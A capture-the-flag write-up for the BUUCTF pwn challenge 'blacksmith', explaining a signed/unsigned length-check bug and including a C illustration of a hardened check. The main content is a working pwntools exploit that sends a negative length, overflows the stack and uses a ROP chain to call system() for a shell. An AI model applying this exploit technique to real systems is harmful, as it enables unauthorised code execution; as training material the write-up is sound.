BUU-metasequoia_2020_blacksmith-WP

Posted on Jan 14, 2021

Integer overflow: size_t is an unsigned integer type no smaller than the machine word, but the length check here is done with a signed int, so entering a negative number gives us an easy stack overflow.
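As an added illustration of the bug class (constructed model, not the challenge's source; the function names and the 0x40 buffer size are assumptions, the size chosen to match the padding in the exp below), here is the signed-vs-size_t length check beside a hardened version:

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stddef.h>

/* Constructed model of the bug described above, not the challenge binary:
   a length is parsed as a signed int, bounds-checked as signed, and then
   handed to a size_t parameter. NAME_BUF is an assumption (0x40 matches
   the padding used in the exploit script). */
#define NAME_BUF 0x40

/* Vulnerable: "len > NAME_BUF" is a signed comparison, so -1 passes the
   check, and the cast to size_t turns it into SIZE_MAX as the read length. */
size_t vulnerable_read_len(const char *input) {
    int len = atoi(input);
    if (len > NAME_BUF)
        return 0;               /* rejected: nothing would be read */
    return (size_t)len;         /* -1 becomes 18446744073709551615 on 64-bit */
}

/* Hardened: reject negatives before the type changes, then compare in the
   unsigned domain against the real buffer size. */
size_t hardened_read_len(const char *input) {
    long len = strtol(input, NULL, 10);
    if (len < 0 || (size_t)len > NAME_BUF)
        return 0;               /* rejected */
    return (size_t)len;
}

/* True when the length that would reach read() exceeds the destination. */
int would_overflow(size_t n) {
    return n > NAME_BUF;
}

int main(void) {
    const char *inputs[] = { "16", "100", "-1" };
    for (size_t i = 0; i < 3; i++) {
        size_t v = vulnerable_read_len(inputs[i]);
        size_t h = hardened_read_len(inputs[i]);
        printf("input %4s: vulnerable=%zu (overflow=%d) hardened=%zu\n",
               inputs[i], v, would_overflow(v), h);
    }
    return 0;
}
```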

exp

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')
pop_rdi = 0x400b23                      # "pop rdi; ret" gadget in the binary

#sh = process("./metasequoia_2020_blacksmith")
sh = remote("node3.buuoj.cn",28754)
elf = ELF("./metasequoia_2020_blacksmith")

sh.sendlineafter(b"choice > ",b"1")
sh.sendlineafter(b"name?\n",b'-1')      # negative length passes the signed check
# 0x40 bytes of buffer + 8 bytes of saved rbp, then the ROP chain:
# pop rdi; ret -> argument for system() -> system()
payload = b'a' * 0x40 + b'b' * 8 + p64(pop_rdi) + p64(0x400b48) + p64(elf.symbols['system'])
sh.sendlineafter(b"is?\n",payload)
sh.interactive()